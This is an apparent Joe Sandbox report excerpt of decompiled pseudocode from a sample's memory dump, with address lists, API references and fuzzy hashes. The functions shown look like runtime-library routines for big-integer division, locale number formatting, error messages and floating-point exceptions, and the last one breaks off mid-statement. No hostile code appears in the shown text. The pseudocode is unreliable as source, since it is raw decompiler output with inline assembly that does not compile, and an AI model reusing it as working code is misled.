				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00A4F0C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00A621C0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00A4F0E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00A4F0E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xa5ea5d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00A621C0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00A5BDE1(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00A5BDE1(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00A5BDE1(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x00a5d44c
0x00a5d44f
0x00a5d453
0x00a5d45d
0x00a5d460
0x00a5d462
0x00a5d464
0x00a5d471
0x00a5d471
0x00a5d474
0x00a5d474
0x00a5d477
0x00a5d47a
0x00a5d47c
0x00a5d5af
0x00a5d5b1
0x00a5d5fa
0x00a5d5fe
0x00a5d604
0x00a5d5b3
0x00a5d5b5
0x00a5d5b8
0x00a5d5ba
0x00a5d5bd
0x00a5d5bf
0x00a5d5c1
0x00a5d5f5
0x00a5d5f5
0x00a5d5f5
0x00a5d5c3
0x00a5d5c8
0x00a5d5ce
0x00a5d5ce
0x00a5d5d1
0x00a5d5d3
0x00a5d5d5
0x00000000
0x00000000
0x00a5d5d7
0x00a5d5d8
0x00a5d5db
0x00a5d5de
0x00a5d5e0
0x00000000
0x00a5d5e2
0x00000000
0x00a5d5e2
0x00000000
0x00a5d5e0
0x00a5d5e4
0x00a5d5eb
0x00a5d5ef
0x00a5d5f3
0x00000000
0x00000000
0x00a5d5f3
0x00a5d5f6
0x00a5d5f6
0x00a5d5f8
0x00a5d605
0x00a5d608
0x00a5d60b
0x00a5d60e
0x00a5d60e
0x00a5d612
0x00a5d615
0x00a5d618
0x00a5d61b
0x00a5d626
0x00a5d61d
0x00a5d622
0x00a5d622
0x00a5d630
0x00a5d635
0x00a5d638
0x00a5d63a
0x00a5d644
0x00a5d647
0x00a5d64e
0x00a5d651
0x00a5d654
0x00a5d65c
0x00a5d662
0x00a5d662
0x00a5d662
0x00a5d662
0x00a5d654
0x00a5d667
0x00a5d66e
0x00a5d66e
0x00a5d671
0x00a5d674
0x00a5d8a6
0x00a5d8a6
0x00a5d67a
0x00a5d67a
0x00a5d680
0x00a5d683
0x00a5d686
0x00a5d689
0x00a5d68c
0x00a5d68f
0x00a5d692
0x00a5d692
0x00a5d695
0x00a5d69c
0x00a5d69c
0x00a5d697
0x00a5d697
0x00a5d697
0x00a5d69e
0x00a5d6a2
0x00a5d6a5
0x00a5d6a7
0x00a5d6aa
0x00a5d6b1
0x00a5d6b4
0x00a5d6b7
0x00a5d6c2
0x00a5d6c5
0x00a5d6ca
0x00a5d6cf
0x00a5d6d6
0x00a5d6db
0x00a5d6dd
0x00a5d6df
0x00a5d6e3
0x00a5d6e6
0x00a5d6e9
0x00a5d6f1
0x00a5d6fa
0x00a5d6fa
0x00a5d6fc
0x00a5d6ff
0x00a5d6ff
0x00a5d6e9
0x00a5d709
0x00a5d70e
0x00a5d713
0x00a5d715
0x00a5d718
0x00a5d71a
0x00a5d71d
0x00a5d720
0x00a5d722
0x00a5d725
0x00a5d728
0x00a5d72a
0x00a5d731
0x00a5d736
0x00a5d739
0x00a5d743
0x00a5d745
0x00a5d747
0x00a5d74a
0x00a5d74a
0x00a5d74c
0x00a5d74f
0x00a5d752
0x00a5d755
0x00a5d758
0x00a5d72c
0x00a5d72c
0x00a5d72f
0x00000000
0x00000000
0x00a5d72f
0x00a5d75b
0x00a5d75d
0x00a5d75f
0x00000000
0x00a5d761
0x00a5d761
0x00a5d764
0x00a5d766
0x00a5d766
0x00a5d774
0x00a5d777
0x00a5d77c
0x00a5d77e
0x00000000
0x00000000
0x00a5d780
0x00a5d787
0x00a5d787
0x00a5d78a
0x00a5d78d
0x00a5d790
0x00a5d793
0x00a5d793
0x00a5d796
0x00a5d799
0x00a5d79d
0x00a5d7a0
0x00a5d7a2
0x00a5d7a5
0x00000000
0x00000000
0x00a5d7a7
0x00a5d7a5
0x00a5d782
0x00a5d782
0x00a5d785
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5d785
0x00a5d7ac
0x00a5d7ac
0x00000000
0x00a5d7ac
0x00a5d7a9
0x00000000
0x00a5d7a9
0x00a5d764
0x00a5d75f
0x00a5d7af
0x00a5d7af
0x00a5d7b1
0x00a5d7bb
0x00a5d7bb
0x00a5d7be
0x00a5d7c0
0x00a5d7c2
0x00a5d7c4
0x00a5d7c9
0x00a5d7cc
0x00a5d7cc
0x00a5d7cf
0x00a5d7d2
0x00a5d7d5
0x00a5d7d7
0x00a5d7ec
0x00a5d7ee
0x00a5d7f0
0x00a5d7f2
0x00a5d7f4
0x00a5d7f6
0x00a5d7f8
0x00a5d7fa
0x00a5d7fd
0x00a5d7fd
0x00a5d801
0x00a5d803
0x00a5d809
0x00a5d80c
0x00a5d80c
0x00a5d80c
0x00a5d810
0x00a5d810
0x00a5d815
0x00a5d818
0x00a5d818
0x00a5d81d
0x00a5d81f
0x00a5d821
0x00a5d828
0x00a5d828
0x00a5d82a
0x00a5d82f
0x00a5d831
0x00a5d834
0x00a5d834
0x00a5d837
0x00a5d840
0x00a5d840
0x00a5d842
0x00a5d842
0x00a5d847
0x00a5d84d
0x00a5d851
0x00a5d854
0x00a5d857
0x00a5d859
0x00a5d859
0x00a5d859
0x00a5d85e
0x00a5d85e
0x00a5d861
0x00a5d864
0x00a5d823
0x00a5d823
0x00a5d826
0x00000000
0x00000000
0x00a5d826
0x00a5d821
0x00a5d86b
0x00a5d86b
0x00a5d86c
0x00a5d7b3
0x00a5d7b3
0x00a5d7b5
0x00000000
0x00000000
0x00a5d7b5
0x00a5d87c
0x00a5d881
0x00a5d884
0x00a5d888
0x00a5d889
0x00a5d88c
0x00a5d88f
0x00a5d890
0x00a5d893
0x00a5d896
0x00a5d899
0x00a5d89c
0x00a5d89c
0x00a5d8a4
0x00a5d8ab
0x00a5d8ac
0x00a5d8ae
0x00a5d8b0
0x00a5d8b2
0x00a5d8b5
0x00a5d8c0
0x00a5d8c0
0x00a5d8c6
0x00a5d8c6
0x00a5d8c9
0x00a5d8ca
0x00a5d8ca
0x00a5d8c0
0x00a5d8ce
0x00a5d8d0
0x00a5d8d2
0x00a5d8d4
0x00a5d8d4
0x00a5d8d6
0x00a5d8da
0x00000000
0x00000000
0x00a5d8dc
0x00a5d8dc
0x00a5d8df
0x00a5d8e1
0x00000000
0x00000000
0x00000000
0x00a5d8e1
0x00a5d8d4
0x00a5d8e3
0x00a5d8ed
0x00000000
0x00000000
0x00000000
0x00a5d5f8
0x00a5d482
0x00a5d482
0x00a5d482
0x00a5d485
0x00a5d488
0x00a5d48b
0x00a5d4bc
0x00a5d4be
0x00a5d509
0x00a5d50b
0x00a5d512
0x00a5d519
0x00a5d51c
0x00a5d51f
0x00a5d525
0x00a5d525
0x00a5d526
0x00a5d529
0x00a5d530
0x00a5d539
0x00a5d53e
0x00a5d541
0x00a5d546
0x00a5d549
0x00a5d54b
0x00a5d550
0x00a5d553
0x00a5d556
0x00a5d556
0x00a5d556
0x00a5d55a
0x00a5d55d
0x00a5d55d
0x00a5d562
0x00a5d562
0x00a5d56d
0x00a5d578
0x00a5d578
0x00a5d57b
0x00a5d587
0x00a5d58c
0x00a5d597
0x00a5d599
0x00a5d59b
0x00a5d5a1
0x00a5d5a6
0x00a5d5a8
0x00a5d5ae
0x00a5d4c0
0x00a5d4cc
0x00a5d4cc
0x00a5d4cf
0x00a5d4df
0x00a5d4e5
0x00a5d4ec
0x00a5d4ee
0x00a5d4f6
0x00a5d4f8
0x00a5d4fa
0x00a5d4ff
0x00a5d502
0x00a5d508
0x00a5d508
0x00a5d48d
0x00a5d490
0x00a5d494
0x00a5d49a
0x00a5d4a9
0x00a5d4b3
0x00a5d4bb
0x00a5d4bb
0x00a5d48b
0x00a5d466
0x00a5d469
0x00a5d46f
0x00a5d46f
0x00a5d455
0x00a5d45b
0x00a5d45b

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: f024af3494d46b33da4af5ce71adea56285db12cb4ef851c3eef6885d85c9961
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: DB021C71E002199FDF24CFA9C9806ADB7F1FF88315F258269D919EB384D731AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AF0F Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4AF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xa6e73c == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xa8fcb0 = _v304;
					 *0xa8fcb2 = 0;
					 *0xa6e73c = 0xa8fcb0;
				}
				E00A404BD(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xa6e72c, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00a4af27
0x00a4af35
0x00a4af42
0x00a4af4a
0x00a4af50
0x00a4af50
0x00a4af66
0x00a4af6b
0x00a4af70
0x00a4af7a
0x00a4af84
0x00a4af8c
0x00a4af95

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A4AF35
GetNumberFormatW.KERNEL32 ref: 00A4AF84

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 13a2a86471cb0f8a0bde2b8a4fdc7c0fce953a91079b5106516d6ce75fe51c4c
Instruction ID: b53dac8a5c2318d69e563d4466cdeb732ee53c2d144c6acb721a55c2b297c1a3
Opcode Fuzzy Hash: 13a2a86471cb0f8a0bde2b8a4fdc7c0fce953a91079b5106516d6ce75fe51c4c
Instruction Fuzzy Hash: 61017C7A100309BEDB10DFA5EC45F9A77BCEF49711F404422FA05AB190E3B0AA16CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A36C74 Relevance: 3.0, APIs: 2, Instructions: 16
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A36C74(WCHAR* _a4, long _a8) {
				long _t5;

				_t5 = GetLastError();
				if(_t5 == 0) {
					return 0;
				}
				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
			}

0x00a36c74
0x00a36c7c
0x00000000
0x00a36ca2
0x00000000

APIs

GetLastError.KERNEL32(00A36DDF,00000000,00000400), ref: 00A36C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A36C95

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 0e1f617392c3bf79048616beb2c95805676a62940134a5d994a6061399bde34c
Instruction ID: c5f5da6036d878d3c857f4a9d0d80ca97b687996a2603286cb9942f5ca736826
Opcode Fuzzy Hash: 0e1f617392c3bf79048616beb2c95805676a62940134a5d994a6061399bde34c
Instruction Fuzzy Hash: 90D0C731344300BFFE114F618D06F5A7B69BF45B51F15D404B755D40E0C7B49426A629

Uniqueness

Uniqueness Score: -1.00%

Function 00A619F4 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A619F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00A5F352(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00A5F2B8(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
